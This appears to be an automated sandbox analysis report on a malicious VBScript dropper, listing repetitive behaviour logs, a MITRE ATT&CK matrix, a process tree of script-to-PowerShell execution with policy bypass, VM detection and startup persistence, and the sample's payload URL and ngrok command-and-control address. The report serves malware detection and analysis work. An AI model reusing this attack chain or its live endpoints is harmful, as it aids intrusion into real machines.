Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
MITRE ATT&CK matrix (techniques listed per tactic in the report's column order; the digits in front of a technique are the count badges shown in that matrix cell):

  • Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
  • Resource Development: 222 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet
  • Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
  • Execution: 11 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 1 Exploitation for Client Execution; 3 PowerShell; Launchd; Scheduled Task
  • Persistence: 222 Scripting; 2 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts
  • Privilege Escalation: 11 Process Injection; 2 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts
  • Defense Evasion: 1 Masquerading; 131 Virtualization/Sandbox Evasion; 11 Process Injection; 2 Obfuscated Files or Information; 1 DLL Side-Loading; Steganography
  • Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
  • Discovery: 121 Security Software Discovery; 1 Process Discovery; 131 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 13 System Information Discovery
  • Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
  • Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
  • Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 1 Application Layer Protocol; Fallback Channels; Multiband Communication
  • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
  • Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 1573765
Sample: 7299_output.vbs
Startdate: 12/12/2024
Architecture: WINDOWS
Score: 100

Network nodes attached to the sample: emptyservices.xyz (Performs DNS queries to domains with low reputation); 0.tcp.eu.ngrok.io
Signatures attached to the sample: Sigma detected: Drops script at startup location; Connects to many ports of the same IP (likely port scanning); Sigma detected: WScript or CScript Dropper; 2 other signatures

Process tree from the behavior graph (graph node number in brackets, created registry value / file counts in parentheses, as shown on the graph):

wscript.exe [13] (2)
  dropped: C:\Users\user\AppData\Local\Temp\c.bat, DOS
  signatures: VBScript performs obfuscated calls to suspicious functions; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
  cmd.exe [19] (1)
    cmd.exe [28] (1)
      signatures: Wscript starts Powershell (via cmd or directly)
      powershell.exe [45] (29)
        dropped: C:\Users\user\AppData\...\Network97287Man.cmd, DOS
        signatures: Suspicious powershell command line found
        cmd.exe [57] (1)
          cmd.exe [61] (1)
            signatures: Wscript starts Powershell (via cmd or directly)
            powershell.exe [66] (28)
              network: 0.tcp.eu.ngrok.io 3.78.28.71, ports 13094, 49846, 49864, AMAZON-02US, United States; 127.0.0.1 unknown unknown
              signatures: Suspicious powershell command line found
              powershell.exe [74]
            conhost.exe [70]
            cmd.exe [72] (1)
          conhost.exe [64]
        powershell.exe [59] (28)
      conhost.exe [49]
      timeout.exe [51] (1)
      cmd.exe [53] (1)
    conhost.exe [31]
  cmd.exe [21] (1)
    signatures: Wscript starts Powershell (via cmd or directly); Bypasses PowerShell execution policy
    powershell.exe [33] (14 15)
      signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Suspicious powershell command line found
    conhost.exe [35]
cmd.exe [17] (1)
  cmd.exe [24] (1)
    powershell.exe [37] (27)
      powershell.exe [55]
    conhost.exe [39]
    cmd.exe [41]
    timeout.exe [43]
  conhost.exe [26]

Source: 7299_output.vbs, Detection: 0%, Scanner: ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source: https://emptyservices.xyz/stub, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
Source: https://emptyservices.xyz/stub.txt, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
Name: 0.tcp.eu.ngrok.io, IP: 3.78.28.71, Active: true, Malicious: true, Antivirus Detection: none, Reputation: unknown
Name: emptyservices.xyz, IP: unknown, Active: unknown, Malicious: false, Antivirus Detection: none, Reputation: high
Name: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.1759342843.000001D0901B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1742529866.000001D08194B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1759342843.000001D090076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2417006944.0000025C57FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2417006944.0000025C57E7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C49A03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C480CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2637178911.000001F3A657B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3981F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2637178911.000001F3A66B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3967CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CD9384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2762765196.0000020CE904C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2762765196.0000020CE9183000.00000004.00000800.00020000.00000000.sdmp
Malicious: false, Antivirus Detection: none, Reputation: high

Name: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000D.00000002.2362046480.0000025C497B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F397EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CDA98C000.00000004.00000800.00020000.00000000.sdmp
Malicious: false, Antivirus Detection: none, Reputation: high

Name: https://emptyservices.xyz/stub
Source: powershell.exe, 00000003.00000002.1742529866.000001D081778000.00000004.00000800.00020000.00000000.sdmp
Malicious: true, Antivirus Detection: Avira URL Cloud: safe, Reputation: unknown

Name: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001D.00000002.2597422708.0000020CDAB97000.00000004.00000800.00020000.00000000.sdmp
Malicious: false, Antivirus Detection: none, Reputation: high

Name: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001D.00000002.2597422708.0000020CDAB97000.00000004.00000800.00020000.00000000.sdmp
Malicious: false, Antivirus Detection: none, Reputation: high

Name: https://go.micro
Source: powershell.exe, 00000003.00000002.1742529866.000001D080C2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C48D2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F397940000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CD9EFD000.00000004.00000800.00020000.00000000.sdmp
Malicious: false, Antivirus Detection: none, Reputation: high

Name: https://contoso.com/
Source: powershell.exe, 0000001D.00000002.2597422708.0000020CDABF2000.00000004.00000800.00020000.00000000.sdmp
Malicious: false, Antivirus Detection: none, Reputation: high

Name: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.1759342843.000001D0901B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1742529866.000001D08194B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1759342843.000001D090076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2417006944.0000025C57FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2417006944.0000025C57E7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C49A03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C480CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2637178911.000001F3A657B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3981F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2637178911.000001F3A66B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3967CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CD92A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2762765196.0000020CE904C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2762765196.0000020CE9183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CDABF2000.00000004.00000800.00020000.00000000.sdmp
Malicious: false, Antivirus Detection: none, Reputation: high

Name: https://contoso.com/License
Source: powershell.exe, 0000001D.00000002.2597422708.0000020CDABF2000.00000004.00000800.00020000.00000000.sdmp
Malicious: false, Antivirus Detection: none, Reputation: high

Name: https://contoso.com/Icon
Source: powershell.exe, 0000001D.00000002.2597422708.0000020CDABF2000.00000004.00000800.00020000.00000000.sdmp
Malicious: false, Antivirus Detection: none, Reputation: high

Name: https://oneget.orgX
Source: powershell.exe, 0000000D.00000002.2362046480.0000025C497B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F397EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CDA98C000.00000004.00000800.00020000.00000000.sdmp
Malicious: false, Antivirus Detection: none, Reputation: high

Name: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.1742529866.000001D080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C47DF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3964F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CD8FC1000.00000004.00000800.00020000.00000000.sdmp
Malicious: false, Antivirus Detection: none, Reputation: high

Name: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1742529866.000001D080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C47DF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3964F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CD8FC1000.00000004.00000800.00020000.00000000.sdmp
Malicious: false, Antivirus Detection: none, Reputation: high

Name: https://emptyservices.xyz/stub.txt
Source: powershell.exe, 00000003.00000002.1764714970.000001D0F58A4000.00000004.00000020.00020000.00000000.sdmp, 7299_output.vbs
Malicious: true, Antivirus Detection: Avira URL Cloud: safe, Reputation: unknown

Name: https://emptyservices.xyz
Source: powershell.exe, 00000003.00000002.1742529866.000001D081341000.00000004.00000800.00020000.00000000.sdmp
Malicious: false, Antivirus Detection: none, Reputation: high

Name: https://github.com/Pester/Pester
Source: powershell.exe, 0000001D.00000002.2597422708.0000020CDAB97000.00000004.00000800.00020000.00000000.sdmp
Malicious: false, Antivirus Detection: none, Reputation: high

Name: https://oneget.org
Source: powershell.exe, 0000000D.00000002.2362046480.0000025C497B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F397EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CDA98C000.00000004.00000800.00020000.00000000.sdmp
Malicious: false, Antivirus Detection: none, Reputation: high
IP: 3.78.28.71, Domain: 0.tcp.eu.ngrok.io, Country: United States, ASN: 16509, ASN Name: AMAZON-02US, Malicious: true
Private IP: 127.0.0.1
